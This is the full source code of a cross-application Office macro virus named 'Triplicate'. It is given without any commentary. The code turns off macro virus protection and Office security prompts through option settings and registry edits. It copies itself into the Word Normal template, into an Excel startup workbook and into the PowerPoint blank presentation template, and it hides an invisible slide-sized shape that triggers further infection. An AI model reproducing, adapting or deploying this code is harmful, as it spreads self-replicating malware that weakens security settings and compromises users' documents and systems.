

```

'<!--Internal-->
'Triplicate v0.21 /!Internal
Private Sub Document_Close()
    On Error Resume Next
    Options.VirusProtection = False
    Options.ConfirmConversions = False
    Options.SaveNormalPrompt = False
    Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
    Set TT = Templates(1).VBProject.VBComponents(1).CodeModule
    Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
    If AD.Lines(1, 1) <> "'<!--Internal-->" Then
        AD.DeleteLines 1, AD.CountofLines
        AD.InsertLines 1, TT.Lines(1, TT.CountofLines)
        If AD.Lines(1, 1) <> "'<!--Internal-->" Then
            AD.InsertLines 1, NT.Lines(1, NT.CountofLines)
        End If
    End If
    If NT.Lines(1, 1) <> "'<!--Internal-->" Then
        NT.DeleteLines 1, NT.CountofLines
        NT.InsertLines 1, AD.Lines(1, AD.CountofLines)
        Set xlApp = CreateObject("Excel.Application")
        If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <>
UCase("BOOK1") Then
            System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel",
"Options6") = "Check"
            System.PrivateProfileString("",
"HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User
Settings\Excel\Microsoft Excel", "Options6") = ""
            System.PrivateProfileString("",
"HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft
Excel", "Options6") = "Whoa"
            Set Book1Obj = xlApp.Workbooks.Add

Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1,
NT.Lines(1, NT.CountofLines)
            Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
            Book1Obj.Close
        End If
        xlApp.Quit
        Set PPObj = CreateObject("PowerPoint.Application")
        Set PBT = PPObj.Presentations.Open(Application.Path +
"\..\Templates\Blank Presentation.pot", , , msoFalse)
        For Each ModComponent In PBT.VBProject.VBComponents
            If ModComponent.Name = "Triplicate" Then dontadd = True
        Next
        If dontadd <> True Then
            System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\PowerPoint\Options",
"MacroVirusProtection") = ""
            System.PrivateProfileString("",
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\8.0\New User
Settings\PowerPoint\Options", "MacroVirusProtection") = ""

```

```

        System.PrivateProfileString("",
"HKEY_USERS\Default\Software\Microsoft\Office\8.0\PowerPoint\Options",
"MacroVirusProtection") = ""
        Set NewMod = PBT.VBProject.VBComponents.Add(1)
        NewMod.Name = "Triplicate"
        NewMod.CodeModule.InsertLines 1, NT.Lines(1, NT.CountofLines)
        NewMod.CodeModule.ReplaceLine 118, "Sub actionhook(tristate)"
        Set ShapetoWack = PBT.SlideMaster.Shapes.AddShape(1, 0, 0,
PBT.PageSetup.SlideWidth, PBT.PageSetup.SlideHeight)
        With ShapetoWack
            .Name = "Triplicate"
            .ZOrder (1)
            .Line.Visible = False
            .Fill.Visible = False
            .ActionSettings(1).Action = 8
            .ActionSettings(1).Run = "actionhook"
        End With
        Set NewMod = Nothing
        PBT.Save
    End If
    PBT.Close
    PPObj.Quit
End If
If TT.Lines(1, 1) <> "'<!--Internal-->" Then
    TT.DeleteLines 1, TT.CountofLines
    TT.InsertLines 1, NT.Lines(1, NT.CountofLines)
End If
End Sub
Private Sub Workbook_Deactivate()
    On Error Resume Next
    Set AW =
ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
    Set TW =
ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
    If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" Then
        Set WordObj = GetObject(, "Word.Application")
        If WordObj = "" Then
            Set WordObj = CreateObject("Word.Application")
            WQuit = True
        End If
        Set NT =
WordObj.NormalTemplate.VBProject.VBComponents(1).CodeModule
        WordObj.Options.SaveNormalPrompt = False
        NT.InsertLines 1, "Public Sub DisableAV()" + Chr(13) + Chr(10) +
TW.Lines(23, 3) + Chr(13) + Chr(10) + TW.Lines(38, 3) + Chr(13) + Chr(10)
+ "End Sub"
        WordObj.Run "Normal.ThisDocument.DisableAV"
        NT.DeleteLines 1, NT.CountofLines
        NT.InsertLines 1, TW.Lines(1, TW.CountofLines)
        Set NT = Nothing
        If WQuit = True Then WordObj.Quit
        Set PPObj = CreateObject("PowerPoint.Application")
        Set PBT = PPObj.Presentations.Open(Application.Path +
"\..\Templates\Blank Presentation.pot", , , msoFalse)

```

```

For Each ModComponent In PBT.VBProject.VBComponents
    If ModComponent.Name = "Triplicate" Then dontadd = True
Next
If dontadd <> True Then
    Set NewMod = PBT.VBProject.VBComponents.Add(1)
    NewMod.Name = "Triplicate"
    NewMod.CodeModule.InsertLines 1, TW.Lines(1, TW.CountofLines)
    NewMod.CodeModule.ReplaceLine 118, "Sub actionhook(tristate)"
    Set ShapetoWack = PBT.SlideMaster.Shapes.AddShape(1, 0, 0,
PBT.PageSetup.SlideWidth, PBT.PageSetup.SlideHeight)
    With ShapetoWack
        .Name = "Triplicate"
        .ZOrder (1)
        .Line.Visible = False
        .Fill.Visible = False
        .ActionSettings(1).Action = 8
        .ActionSettings(1).Run = "actionhook"
    End With
    Set NewMod = Nothing
    PBT.Save
End If
PBT.Close
PPObj.Quit
Set xlApp = CreateObject("Excel.Application")
Set Book1Obj = xlApp.Workbooks.Add

Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1,
TW.Lines(1, TW.CountofLines)
Book1Obj.SaveAs FileName:=Application.StartupPath & "\Book1.",
FileFormat:=xlNormal, AddToMru:=False
Book1Obj.Close
xlApp.Quit
End If
If AW.Lines(1, 1) <> "'<!--Internal-->" Then
    AW.InsertLines 1, TW.Lines(1, TW.CountofLines)
End If
End Sub
Private Sub actionhook(tristate)
    On Error Resume Next
    If Int(Rnd * 7) = 0 Then
        Set Home = ActivePresentation
        If UCase(Dir(Application.Path + "\Xlstart\Book1.)) <>
UCase("BOOK1") Then
            Set WordObj = GetObject(, "Word.Application")
            If WordObj = "" Then
                Set WordObj = CreateObject("Word.Application")
                WQuit = True
            End If
            Set NT =
WordObj.NormalTemplate.VBProject.VBComponents(1).CodeModule
            WordObj.Options.SaveNormalPrompt = False
            NT.InsertLines 1, "Public Sub DisableAV()" + Chr(13) +
Chr(10) + Home.VBProject.VBComponents("Triplicate").CodeModule.Lines(23,
3) + Chr(13) + Chr(10) +

```

```

Home.VBProject.VBComponents("Triplicate").CodeModule.Lines(38, 3) +
Chr(13) + Chr(10) + "End Sub"
    WordObj.Run "Normal.ThisDocument.DisableAV"
    NT.DeleteLines 1, NT.CountofLines
    NT.InsertLines 1,
Home.VBProject.VBComponents("Triplicate").CodeModule.Lines(1,
Home.VBProject.VBComponents("Triplicate").CodeModule.CountofLines)
    NT.ReplaceLine 118, "Private Sub actionhook(tristate)"
    Set NT = Nothing
    If WQuit = True Then WordObj.Quit
    Set xlApp = CreateObject("Excel.Application")
    Set Book1Obj = xlApp.Workbooks.Add

Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1,
Home.VBProject.VBComponents("Triplicate").CodeModule.Lines(1,
Home.VBProject.VBComponents("Triplicate").CodeModule.CountofLines)

Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.ReplaceLine
118, "Private Sub actionhook(tristate)"
    Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
    Book1Obj.Close
    xlApp.Quit
    Set PBT = Presentations.Open(Application.Path +
"\..\Templates\Blank Presentation.pot", , , msoFalse)
    dontadd = False
    For Each ModComponent In PBT.VBProject.VBComponents
        If ModComponent.Name = "Triplicate" Then dontadd = True
    Next
    If dontadd <> True Then
        Set NewMod = PBT.VBProject.VBComponents.Add(1)
        NewMod.Name = "Triplicate"
        NewMod.CodeModule.InsertLines 1,
Home.VBProject.VBComponents("Triplicate").CodeModule.Lines(1,
Home.VBProject.VBComponents("Triplicate").CodeModule.CountofLines)
        Set ShapetoWack = PBT.SlideMaster.Shapes.AddShape(1, 0,
0, PBT.PageSetup.SlideWidth, PBT.PageSetup.SlideHeight)
        With ShapetoWack
            .Name = "Triplicate"
            .ZOrder (1)
            .Line.Visible = False
            .Fill.Visible = False
            .ActionSettings(1).Action = 8
            .ActionSettings(1).Run = "actionhook"
        End With
        PBT.Save
    End If
    PBT.Close
End If
End If
ActivePresentation.SlideShowWindow.View.Next
End Sub

```